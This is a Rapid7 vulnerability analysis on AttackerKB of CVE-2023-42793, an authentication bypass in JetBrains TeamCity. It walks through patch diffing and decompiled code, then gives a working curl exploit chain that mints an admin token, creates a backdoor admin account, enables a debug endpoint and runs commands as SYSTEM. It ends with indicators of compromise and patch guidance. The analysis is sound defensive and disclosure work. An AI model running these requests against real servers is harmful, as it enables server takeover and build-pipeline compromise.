https://attackerkb.com/topics/1XEEEkGHzt/cve-2023-42793
https://www.securityweek.com/recently-patched-teamcity-vulnerability-exploited-to-hack-servers/
https://www.rapid7.com/blog/post/2023/09/25/etr-cve-2023-42793-critical-authentication-bypass-in-jetbrains-teamcity-ci-cd-servers/
ADDITIONAL INFO
Authenticated
Unknown
Exploitable
Unknown
Reliability
Unknown
Stability
Unknown
Available Mitigations
Unknown
Shelf Life
Unknown
Userbase/Installbase
Unknown
Patch Effectiveness
Unknown
Rapid7
September 27, 2023 1:43pm UTC (4 months ago)
TECHNICAL ANALYSIS
OVERVIEW
CVE-2023-42793 is a critical authentication bypass published on September 19,
2023 that affects on-premises instances of JetBrains TeamCity, a CI/CD server.
The vulnerability, originally discovered by Sonar, allows an unauthenticated
attacker to achieve remote code execution (RCE) on the server. By compromising a
CD/CD server the attacker will have access to private data such as source code,
access keys, code signing certificates and other build components commonly
accessible by a CI/CD server. This places the attacker in a strong position to
achieve a supply chain attack by compromising the integrity of the server’s
build process and the resulting build artifacts, such as compiled binaries.
The vulnerability has a CVSS base score of 9.8. All versions of JetBrains
TeamCity prior to the patched version 2023.05.4 are vulnerable to this issue.
There is no known exploitation in the wild as of September 27, 2023.
TECHNICAL ANALYSIS
In this technical analysis we will analyze the vulnerability as it affects
JetBrains TeamCity 2023.05.3 running on Windows Server 2022. By default, the
vulnerable web interface listens for HTTP connections on TCP port 8111.
PATCH DIFFING
To diff out the bug we downloaded a vulnerable version 2023.05.3 and patched
version 2023.05.4. Extracting these two installers via 7zip we generate two
folders, .\2023.05.3\ and .\2023.05.4\, containing the entire contents of the
install for each version.
Inspecting the contents of the two folders using a diffing tool like
BeyondCompare, we can identify the Java library web.jar as being of interest.
Using the cfr decompiler we can decompile the web.jar library from each version
into two separate folders as follows:
java -Xmx1g -jar cfr-0.152.jar --outputdir .\2023.05.3\web.jar\ .\2023.05.3\webapps\ROOT\WEB-INF\lib\web.jar
java -Xmx1g -jar cfr-0.152.jar --outputdir .\2023.05.4\web.jar\ .\2023.05.4\webapps\ROOT\WEB-INF\lib\web.jar
We can now diff the Java source. The file RequestInterceptiors.java stands out
as a suspicious wildcard path has been removed. Examining the
XmlRpcController.getPathSuffix method shows the wildcard path that is added to
the myPreHandlingDisabled PathSet is /**/RPC2. Investigating this further
reveals this path is the root cause of the authentication bypass vulnerability.
AUTHENTICATION BYPASS
To learn why the wildcard path /**/RPC2 leads to an authentication bypass
vulnerability. We must understand what this path does. The TeamCity server is a
large Java Spring application; the configuration file
C:\TeamCity\webapps\ROOT\WEB-INF\buildServerSpringWeb.xml creates several
interceptors, which intercept and potentially modify incoming HTTP requests to
the server. Of interest to us is the calledOnceInterceptors Java bean.
<mvc:interceptors>
<ref bean="externalLoadBalancerInterceptor"/>
<ref bean="agentsLoadBalancer"/>
<ref bean="calledOnceInterceptors"/>
<ref bean="pageExtensionInterceptor"/>
</mvc:interceptors>
<bean id="calledOnceInterceptors" class="jetbrains.buildServer.controllers.interceptors.RequestInterceptors">
<constructor-arg index="0">
<list>
<ref bean="mainServerInterceptor"/>
<ref bean="registrationInvitations"/>
<ref bean="projectIdConverterInterceptor"/>
<ref bean="authorizedUserInterceptor"/>
<ref bean="twoFactorAuthenticationInterceptor"/>
<ref bean="firstLoginInterceptor"/>
<ref bean="pluginUIContextProvider"/>
<ref bean="callableInterceptorRegistrar"/>
</list>
</constructor-arg>
</bean>
We can see the calledOnceInterceptors bean will be an instance of the
jetbrains.buildServer.controllers.interceptors.RequestInterceptors class which
contains the wildcard path we are interested in. We can also see that when
constructing the RequestInterceptors instance, several Java beans are passed as
a list, including authorizedUserInterceptor. These beans will be added to the
myInterceptors list during instantiation.
public RequestInterceptors(@NotNull List<HandlerInterceptor> paramList) {
this.myInterceptors.addAll(paramList);
this.myPreHandlingDisabled.addPath("/**" + XmlRpcController.getPathSuffix());
this.myPreHandlingDisabled.addPath("/app/agents/**");
}
The RequestInterceptors instance will then intercept HTTP requests via its
preHandle method, as shown below.
public final boolean preHandle(HttpServletRequest paramHttpServletRequest, HttpServletResponse paramHttpServletResponse, Object paramObject) throws Exception {
try {
if (!requestPreHandlingAllowed(paramHttpServletRequest)) // <---
return true; // <--- return early, no authentication checks!
} catch (Exception exception) {
throw null;
}
Stack stack = requestIn(paramHttpServletRequest);
try {
if (stack.size() >= 70 && paramHttpServletRequest.getAttribute("__tc_requestStack_overflow") == null) {
LOG.warn("Possible infinite recursion of page includes. Request: " + WebUtil.getRequestDump(paramHttpServletRequest));
paramHttpServletRequest.setAttribute("__tc_requestStack_overflow", this);
Throwable throwable = (new ServletException("Too much recurrent forward or include operations")).fillInStackTrace();
paramHttpServletRequest.setAttribute("javax.servlet.jsp.jspException", throwable);
}
} catch (Exception exception) {
throw null;
}
if (stack.size() == 1)
for (HandlerInterceptor handlerInterceptor : this.myInterceptors) {
try {
if (!handlerInterceptor.preHandle(paramHttpServletRequest, paramHttpServletResponse, paramObject)) // <--- enforce authentication checks :(
return false;
} catch (Exception exception) {
throw null;
}
}
return true;
}
Of note is that if requestPreHandlingAllowed returns false (note the negation in
the if statements condition), the preHandle method will return early. However,
if requestPreHandlingAllowed returns true, the myInterceptors list will be
iterated and each interceptor on the list will be run against the request. This
includes the authorizedUserInterceptor bean (an instance of
jetbrains.buildServer.controllers.interceptors.AuthorizationInterceptorImpl)
which will enforce authentication on the request if needed.
Therefore, if we can send a request to a URL that causes
requestPreHandlingAllowed to return false, we can skip the authentication
checks. Examining requestPreHandlingAllowed, we see the PathSet
myPreHandlingDisabled, which we know to contain the wildcard path /**/RPC2, is
used to test the incoming HTTP request’s path.
private boolean requestPreHandlingAllowed(@NotNull HttpServletRequest paramHttpServletRequest) {
try {
if (paramHttpServletRequest == null)
$$$reportNull$$$0(5);
} catch (IllegalArgumentException illegalArgumentException) {
throw null;
}
try {
if (WebUtil.isJspPrecompilationRequest(paramHttpServletRequest))
return false;
} catch (IllegalArgumentException illegalArgumentException) {
throw null;
}
try {
} catch (IllegalArgumentException illegalArgumentException) {
throw null;
}
return !this.myPreHandlingDisabled.matches(WebUtil.getPathWithoutContext(paramHttpServletRequest));
}
Therefore, any incoming HTTP request that matches the wildcard path /**/RPC2
will not be subject to the authentication checks performed by the beans in the
myInterceptors list during RequestInterceptors.preHandle. However, even though
we can construct a path that avoids authentication checks, we still need to
locate a target endpoint the attacker can leverage which also conforms to the
wildcard path — specifically, the target endpoint must end with the string
/RPC2.
EXPLOITATION
To leverage the authentication bypass vulnerability, we will target TeamCity’s
REST API, as implemented in the library
C:\TeamCity\webapps\ROOT\WEB-INF\plugins\.unpacked\rest-api\server\rest-api.jar.
Decompiling this library with cfr we can begin to explore the code. The REST API
will use Java’s Web Services @Path annotation to connect methods with URI
endpoints whilst also defining variable names as templates within the path. For
example @Path(value="/{foo}/properties") will match a URI that ends with a path
segment /properties, and the preceding path segment’s value will be available to
the method being annotated (via an additional @PathParam(value=’foo’)
annotation). Since this technique of constructing URI endpoints allows for
endpoints with arbitrary values in the path, we want to locate the endpoints
that end in a templated variable, as this will allow us to supply the /RPC2
portion of the URI that is required by the vulnerability. Searching the
decompiled code for the regular expression /@Path\(value=\"\S+}\"\)/ will find
all instances that meet this requirement. After some investigation we identify
the jetbrains.buildServer.server.rest.request.UserRequest class as being of
interest, as shown below.
.\2023.05.3\rest-api\jetbrains\buildServer\server\rest\request\UserRequest.java (17 hits)
Line 169: @Path(value="/{userLocator}")
Line 177: @Path(value="/{userLocator}")
Line 189: @Path(value="/{userLocator}")
Line 200: @Path(value="/{userLocator}/{field}")
Line 208: @Path(value="/{userLocator}/{field}")
Line 218: @Path(value="/{userLocator}/{field}")
Line 235: @Path(value="/{userLocator}/properties/{name}")
Line 243: @Path(value="/{userLocator}/properties/{name}")
Line 257: @Path(value="/{userLocator}/properties/{name}")
Line 304: @Path(value="/{userLocator}/roles/{roleId}/{scope}")
Line 313: @Path(value="/{userLocator}/roles/{roleId}/{scope}")
Line 323: @Path(value="/{userLocator}/roles/{roleId}/{scope}")
Line 329: @Path(value="/{userLocator}/roles/{roleId}/{scope}")
Line 371: @Path(value="/{userLocator}/groups/{groupLocator}")
Line 387: @Path(value="/{userLocator}/groups/{groupLocator}")
Line 465: @Path(value="/{userLocator}/tokens/{name}")
Line 494: @Path(value="/{userLocator}/tokens/{name}")
The method createToken appears to allow the caller to create an access token for
a specified user by sending a HTTP POST request to the endpoint
/app/rest/users/{userLocator}/tokens/{name}. As this endpoint ends in a
templated variable, we know we can supply the required /RPC2 value for the
authentication bypass. This will provide a token name of RPC2 during the call to
createToken. To specify a suitable userLocator, we want to provide the name of
an administrator user on the system. TeamCity lets you choose an arbitrary
username during installation, so we don’t necessarily know the actual username
of an administrator account. Handily, however, the first user (with an ID of 1)
will always be the Administrator created during system install. As a result, we
can rely on the ability to specify a user via an ID value using the string id:1.
@Path("/app/rest/users")
@Api("User")
public class UserRequest {
@POST
@Path("/{userLocator}/tokens/{name}")
@Produces({"application/xml", "application/json"})
@ApiOperation(value = "Create a new authentication token for the matching user.", nickname = "addUserToken", hidden = true)
public Token createToken(@ApiParam(format = "UserLocator") @PathParam("userLocator") String userLocator, @PathParam("name") @NotNull String name, @QueryParam("fields") String fields) {
if (name == null)
$$$reportNull$$$0(1);
TokenAuthenticationModel tokenAuthenticationModel = (TokenAuthenticationModel)this.myBeanContext.getSingletonService(TokenAuthenticationModel.class);
SUser user = this.myUserFinder.getItem(userLocator, true);
try {
AuthenticationToken token = tokenAuthenticationModel.createToken(user.getId(), name, new Date(PermanentTokenConstants.NO_EXPIRE.getTime()));
return new Token(token, token.getValue(), new Fields(fields), this.myBeanContext);
} catch (jetbrains.buildServer.serverSide.auth.AuthenticationTokenStorage.CreationException e) {
throw new BadRequestException(e.getMessage());
}
}
}
We can now create an authentication token for an Administrator user, via the
following cURL request, which leverages the RPC2 authentication bypass
vulnerability to successfully reach the target endpoint.
curl -X POST http://192.168.86.50:8111/app/rest/users/id:1/tokens/RPC2
The following is returned to the attacker, containing a newly minted
authentication token with Administrator privileges.
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><token name="RPC2" creationTime="2023-09-27T02:15:35.609-07:00" value="eyJ0eXAiOiAiVENWMiJ9.UmFYd29SRVlLUzd3RUNIa1Jpem81MkNfZjlN.ZjhjZDljNzktNDFiMS00OGE2LWE2ZDQtNzcwOGQ1ZjRhNWU2"/>
Now we have an Administrator authentication token, we can take over the server.
We have full access to the TeamCity REST API and can perform a multitude of
operations, such as creating a new Administrator account with a known password.
This allows us to log into the web interface if needed.
curl --path-as-is -H "Authorization: Bearer eyJ0eXAiOiAiVENWMiJ9.UmFYd29SRVlLUzd3RUNIa1Jpem81MkNfZjlN.ZjhjZDljNzktNDFiMS00OGE2LWE2ZDQtNzcwOGQ1ZjRhNWU2" -X POST http://192.168.86.50:8111/app/rest/users -H "Content-Type: application/json" --data "{\"username\": \"haxor\", \"password\": \"haxor\", \"email\": \"haxor\", \"roles\": {\"role\": [{\"roleId\": \"SYSTEM_ADMIN\", \"scope\": \"g\"}]}}"
As we can see below, we have created a new Admin user account with a password we
know.
Alternatively, to execute arbitrary shell commands on the target server we can
further leverage the API, specifically an undocumented debug API endpoint
/app/rest/debug/processes, as shown below.
@Path(value="/app/rest/debug")
@Api(value="Debug", hidden=true)
public class DebugRequest {
@POST
@Path(value="/processes")
@Consumes(value={"text/plain"})
@Produces(value={"text/plain"})
public String runProcess(@QueryParam(value="exePath") String exePath, @QueryParam(value="params") List<String> params, final @QueryParam(value="idleTimeSeconds") Integer idleTimeSeconds, final @QueryParam(value="maxOutputBytes") Integer maxOutputBytes, @QueryParam(value="charset") String charset, String input) {
if (!TeamCityProperties.getBoolean((String)"rest.debug.processes.enable")) { // <---
throw new BadRequestException("This server is not configured to allow process debug launch via " + LogUtil.quote((String)"rest.debug.processes.enable") + " internal property");
}
this.myDataProvider.checkGlobalPermission(Permission.MANAGE_SERVER_INSTALLATION);
GeneralCommandLine cmd = new GeneralCommandLine();
cmd.setExePath(exePath);
cmd.addParameters(params);
Loggers.ACTIVITIES.info("External process is launched by user " + this.myPermissionChecker.getCurrentUserDescription() + ". Command line: " + cmd.getCommandLineString());
Stopwatch action = Stopwatch.createStarted();
ExecResult execResult = SimpleCommandLineProcessRunner.runCommand((GeneralCommandLine)cmd, (byte[])input.getBytes(Charset.forName(charset != null ? charset : "UTF-8")), (SimpleCommandLineProcessRunner.RunCommandEvents)new SimpleCommandLineProcessRunner.RunCommandEventsAdapter(){
public Integer getOutputIdleSecondsTimeout() {
return idleTimeSeconds;
}
public Integer getMaxAcceptedOutputSize() {
return maxOutputBytes != null && maxOutputBytes > 0 ? maxOutputBytes : 0x100000;
}
});
action.stop();
StringBuffer result = new StringBuffer();
result.append("StdOut:").append(execResult.getStdout()).append("\n");
result.append("StdErr: ").append(execResult.getStderr()).append("\n");
result.append("Exit code: ").append(execResult.getExitCode()).append("\n");
result.append("Time: ").append(TimePrinter.createMillisecondsFormatter().formatTime(action.elapsed(TimeUnit.MILLISECONDS)));
return result.toString();
}
}
The ability to call this endpoint is gated by the configuration option
rest.debug.processes.enable, which is disabled by default. Therefore, we must
first enable this option via the following request.
curl -H "Authorization: Bearer eyJ0eXAiOiAiVENWMiJ9.UmFYd29SRVlLUzd3RUNIa1Jpem81MkNfZjlN.ZjhjZDljNzktNDFiMS00OGE2LWE2ZDQtNzcwOGQ1ZjRhNWU2" -X POST http://192.168.86.50:8111/admin/dataDir.html?action=edit^&fileName=config%2Finternal.properties^&content=rest.debug.processes.enable=true
Finally, for this option to be used by the system we must refresh the server via
the following request.
curl -H "Authorization: Bearer eyJ0eXAiOiAiVENWMiJ9.UmFYd29SRVlLUzd3RUNIa1Jpem81MkNfZjlN.ZjhjZDljNzktNDFiMS00OGE2LWE2ZDQtNzcwOGQ1ZjRhNWU2" http://192.168.86.50:8111/admin/admin.html?item=diagnostics^&tab=dataDir^&file=config/internal.properties
We can now run an arbitrary shell command on the server with the following
request to the /app/rest/debug/processes endpoint. For example:
curl -H "Authorization: Bearer eyJ0eXAiOiAiVENWMiJ9.UmFYd29SRVlLUzd3RUNIa1Jpem81MkNfZjlN.ZjhjZDljNzktNDFiMS00OGE2LWE2ZDQtNzcwOGQ1ZjRhNWU2" -X POST http://192.168.86.50:8111/app/rest/debug/processes?exePath=cmd.exe^¶ms=/c%20whoami
The server’s response for the above request shows the standard output of the
process we created.
StdOut:nt authority\system
StdErr:
Exit code: 0
Time: 59ms
From the output above, we can see we created the process cmd.exe "/c whoami" and
the result that was printed to stdout was nt authority\system. It is worth
noting that when installing TeamCity, you can select to run the server as either
the local system user, or a user account of your choosing that you must create.
During testing we ran the TeamCity server as the local system user.
Finally, an attacker can delete the authentication token they created via the
following request.
curl -X DELETE http://192.168.86.50:8111/app/rest/users/id:1/tokens/RPC2
INDICATORS OF COMPROMISE
On a Windows system, the log file C:\TeamCity\logs\teamcity-server.log will
contain a log message when an attacker modified the internal.properties file.
There will also be a log message for every process created via the
/app/rest/debug/processes endpoint. In addition to showing the command line
used, the user ID of the user account whose authentication token was used during
the attack is also shown. For example:
[2023-09-26 11:53:46,970] INFO - ntrollers.FileBrowseController - File edited: C:\ProgramData\JetBrains\TeamCity\config\internal.properties by user with id=1
[2023-09-26 11:53:46,970] INFO - s.buildServer.ACTIVITIES.AUDIT - server_file_change: File C:\ProgramData\JetBrains\TeamCity\config\internal.properties was modified by "user with id=1"
[2023-09-26 11:53:58,227] INFO - tbrains.buildServer.ACTIVITIES - External process is launched by user user with id=1. Command line: cmd.exe "/c whoami"
An attacker may attempt to cover their tracks by wiping this log file. It does
not appear that TeamCity logs individual HTTP requests, but if TeamCity is
configured to sit behind a HTTP proxy, the HTTP proxy may have suitable logs
showing the following target endpoints being accessed:
* /app/rest/users/id:1/tokens/RPC2 – This endpoint is required to exploit the
vulnerability.
* /app/rest/users – This endpoint is only required if the attacker wishes to
create an arbitrary user.
* /app/rest/debug/processes – This endpoint is only required if the attacker
wishes to create an arbitrary process.
GUIDANCE
The vulnerability has been resolved in version 2023.05.4 of JetBrains TeamCity.
It is strongly recommended that all users update to the latest version of the
software immediately. If you cannot upgrade to the fixed version or implement a
targeted mitigation as specified in the JetBrains advisory, you should consider
taking the server offline until the vulnerability can be mitigated.
REFERENCES
* Vendor Advisory
* Rapid7 Blog
* Sonar Advisory
REPORT AS EXPLOITED IN THE WILD
AttackerKB users want to know this is information they can trust.
Help the community by indicating the source(s) of your knowledge:
* Vendor Advisory
Add a reference URL (optional):
* Government or Industry Alert
Add a reference URL (optional):
* Threat Feed
Add a reference URL (optional):
* News Article or Blog
Add a reference URL (optional):
* Exploitation personally observed in an environment (client, customer,
employer, or personal environment)
Add a reference URL (optional):
* Other:
Please explain the source of your report.
Add a reference URL (optional):
Report and add more details Report as Exploited Update Report
CVE ID
AttackerKB requires a CVE ID in order to pull vulnerability data and references
from the CVE list and the National Vulnerability Database. If available, please
supply below:
CVE ID:
ADD REFERENCES:
Cancel Submit
QUICK COOKIE NOTIFICATION
This site uses cookies for anonymized analytics to improve the site.
Rapid7 will never sell the data collected on this site.
I AGREE, LET’S GO!
--------------------------------------------------------------------------------
View our Cookie Policy for full details
This site uses cookies for anonymized analytics. For more information or to
change your cookie settings, view our Cookie Policy.
Terms of Use Code of Conduct FAQ Changelog Privacy Policy Contact API A Rapid7
Project
WATCH THIS TOPIC
Watch this topic to be notified when new information, assessments, and comments
are added